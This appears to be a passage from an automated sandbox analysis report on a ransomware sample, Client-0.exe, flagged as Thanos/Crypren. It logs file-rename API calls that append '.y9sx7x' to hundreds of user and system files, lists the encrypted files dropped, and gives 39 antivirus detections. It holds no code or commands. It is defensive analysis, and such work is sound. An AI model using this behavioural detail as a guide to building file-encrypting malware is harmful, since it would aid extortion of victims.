MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb newfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat newfilepath: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat newfilepath: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat newfilepath: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat		0

Appends a new file extension or content to 467 files indicative of a ransomware file encryption process (50 out of 467 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\readme.txt newfilepath: C:\readme.txt.y9sx7x oldfilepath: C:\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Windows\bootstat.dat.y9sx7x flags: 2 oldfilepath_r: C:\Windows\bootstat.dat newfilepath: C:\Windows\bootstat.dat.y9sx7x oldfilepath: C:\Windows\bootstat.dat	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt newfilepath: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt.y9sx7x oldfilepath: C:\util\mini-KMS_Activator_v1.1_Office.2010.VL.ENG.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\TCPView\Eula.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\TCPView\Eula.txt newfilepath: C:\util\TCPView\Eula.txt.y9sx7x oldfilepath: C:\util\TCPView\Eula.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\util\ProcessMonitor\Eula.txt.y9sx7x flags: 2 oldfilepath_r: C:\util\ProcessMonitor\Eula.txt newfilepath: C:\util\ProcessMonitor\Eula.txt.y9sx7x oldfilepath: C:\util\ProcessMonitor\Eula.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.y9sx7x oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc newfilepath: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\DiIFqCnigVDeifGD.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\DkSkuYtBvcj.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\DkSkuYtBvcj.doc newfilepath: C:\Users\test22\Documents\DkSkuYtBvcj.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\DkSkuYtBvcj.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\IvVZaQEuSX.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\IvVZaQEuSX.docm newfilepath: C:\Users\test22\Documents\IvVZaQEuSX.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\IvVZaQEuSX.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt newfilepath: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt.y9sx7x oldfilepath: C:\Users\test22\Documents\JYyFOyILPKSZ.ppt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\NKIIOrsnuIi.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\NKIIOrsnuIi.docm newfilepath: C:\Users\test22\Documents\NKIIOrsnuIi.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\NKIIOrsnuIi.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.y9sx7x oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\qDNEXDDorl.pptx.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\qDNEXDDorl.pptx newfilepath: C:\Users\test22\Documents\qDNEXDDorl.pptx.y9sx7x oldfilepath: C:\Users\test22\Documents\qDNEXDDorl.pptx	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\qqjlPSDjqm.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\qqjlPSDjqm.docm newfilepath: C:\Users\test22\Documents\qqjlPSDjqm.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\qqjlPSDjqm.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.cpp.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.cpp newfilepath: C:\Users\test22\Documents\readme.cpp.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.cpp	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.doc newfilepath: C:\Users\test22\Documents\readme.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.hwp.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.hwp newfilepath: C:\Users\test22\Documents\readme.hwp.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.hwp	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.txt newfilepath: C:\Users\test22\Documents\readme.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\readme.xls.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\readme.xls newfilepath: C:\Users\test22\Documents\readme.xls.y9sx7x oldfilepath: C:\Users\test22\Documents\readme.xls	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.y9sx7x oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\SiIydPzVDWm.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\SiIydPzVDWm.txt newfilepath: C:\Users\test22\Documents\SiIydPzVDWm.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\SiIydPzVDWm.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.y9sx7x oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt newfilepath: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x oldfilepath: C:\Users\test22\Documents\ZJxEeTZHFgUo.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.y9sx7x oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\test22\Desktop\readme.txt.y9sx7x flags: 2 oldfilepath_r: C:\Users\test22\Desktop\readme.txt newfilepath: C:\Users\test22\Desktop\readme.txt.y9sx7x oldfilepath: C:\Users\test22\Desktop\readme.txt	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg newfilepath: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.y9sx7x oldfilepath: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg newfilepath: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html newfilepath: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb newfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb newfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat newfilepath: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat		0
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat newfilepath: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\OFFICE\DATA\opa12.dat	1	1
MoveFileWithProgressW March 24, 2021, 10:06 a.m.	newfilepath_r: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat.y9sx7x flags: 2 oldfilepath_r: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat newfilepath: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat.y9sx7x oldfilepath: C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat		0

Drops 425 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 425 events)

file	C:\Python27\Lib\site-packages\MouseInfo-0.1.3-py2.7.egg-info\requires.txt.y9sx7x
file	C:\Python27\tcl\tix8.4.3\pref\Blue.cs.y9sx7x
file	C:\Python27\tcl\tix8.4.3\bitmaps\textfile.gif.y9sx7x
file	C:\Python27\Lib\site-packages\setuptools-41.2.0.dist-info\dependency_links.txt.y9sx7x
file	C:\Python27\click\click_image\ok1.png.y9sx7x
file	C:\Python27\Lib\test\cjkencodings\euc_jisx0213.txt.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\fa_ir.msg.y9sx7x
file	C:\Python27\Lib\test\talos-2019-0758.pem.y9sx7x
file	C:\Python27\tcl\tcl8.5\tzdata\Pacific\Auckland.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_34.txt.y9sx7x
file	C:\Python27\Lib\test\audiodata\pluck-pcm32.wav.y9sx7x
file	C:\Python27\tcl\tk8.5\images\logoLarge.gif.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\hr.msg.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\es_do.msg.y9sx7x
file	C:\Python27\Lib\site-packages\pip\_vendor\certifi\cacert.pem.y9sx7x
file	C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\sq.msg.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\en_ie.msg.y9sx7x
file	C:\util\ProcessMonitor\Eula.txt.y9sx7x
file	C:\Python27\Lib\test\cjkencodings\iso2022_kr-utf8.txt.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_10.txt.y9sx7x
file	C:\Python27\Lib\test\imghdrdata\python.gif.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\fa_in.msg.y9sx7x
file	C:\Python27\click\click_image\attach.png.y9sx7x
file	C:\Python27\tcl\tcl8.5\tzdata\Asia\Ulaanbaatar.y9sx7x
file	C:\Python27\Lib\test\keycert.pem.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_28.txt.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_12.txt.y9sx7x
file	C:\Python27\Lib\test\testtar.tar.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\bn_in.msg.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_07.txt.y9sx7x
file	C:\Python27\Lib\site-packages\MouseInfo-0.1.3-py2.7.egg-info\installed-files.txt.y9sx7x
file	C:\Python27\Lib\test\ffdh3072.pem.y9sx7x
file	C:\Python27\tcl\tcl8.5\tzdata\Turkey.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_25.txt.y9sx7x
file	C:\Python27\click\click_image\msi1.png.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\en_zw.msg.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\es_mx.msg.y9sx7x
file	C:\Python27\click\click\click_image\exec.png.y9sx7x
file	C:\Python27\tcl\tix8.4.3\bitmaps\act_fold.gif.y9sx7x
file	C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.y9sx7x
file	C:\Users\test22\Documents\ZJxEeTZHFgUo.txt.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_16.txt.y9sx7x
file	C:\Python27\Lib\test\imghdrdata\python.jpg.y9sx7x
file	C:\Python27\click\click_image\exec.png.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\ta.msg.y9sx7x
file	C:\Python27\Lib\email\test\data\msg_02.txt.y9sx7x
file	C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.y9sx7x
file	C:\Python27\tcl\tcl8.5\msgs\gl_es.msg.y9sx7x
file	C:\Python27\tcl\tix8.4.3\bitmaps\minusarm.gif.y9sx7x

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Elastic	malicious (high confidence)
DrWeb	Trojan.EncoderNET.31368
Qihoo-360	Win32/Ransom.Generic.HgIASRUA
McAfee	Ransom-Thanos!B4282C7F3FA9
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Alibaba	Trojan:MSIL/Filecoder.da633c3b
Cybereason	malicious.a406fa
BitDefenderTheta	Gen:NN.ZemsilF.34628.fm0@aepBvip
Cyren	W32/A-770b6427!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Avast	Win32:RansomX-gen [Ransom]
Kaspersky	HEUR:Trojan-Ransom.MSIL.Crypren.gen
Paloalto	generic.ml
TrendMicro	Ransom.MSIL.THANOS.SM
McAfee-GW-Edition	BehavesLike.Win32.Generic.nh
FireEye	Generic.mg.b4282c7f3fa918a4
Sophos	Mal/Generic-S + Mal/Hakbit-A
SentinelOne	Static AI - Malicious PE
Webroot	W32.Trojan.MSIL.Crypren
Avira	HEUR/AGEN.1141108
Kingsoft	Win32.Troj.Undef.(kcloud)
Microsoft	Backdoor:Win32/Bladabindi!ml
Gridinsoft	Ransom.Win32.AI.oa
AegisLab	Trojan.MSIL.Crypren.j!c
GData	Win32.Trojan-Ransom.Filecoder.KFL0RV@gen
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Win32.RL_Generic.C4219461
Malwarebytes	Malware.AI.2022078683
ESET-NOD32	a variant of MSIL/Filecoder.Thanos.A
TrendMicro-HouseCall	Ransom.MSIL.THANOS.SM
Rising	Ransom.Crypren!8.1D6C (CLOUD)
Ikarus	Win32.Outbreak
eGambit	Unsafe.AI_Score_95%
Fortinet	MSIL/Thanos.A!tr.ransom
AVG	Win32:RansomX-gen [Ransom]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)

Client-0.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All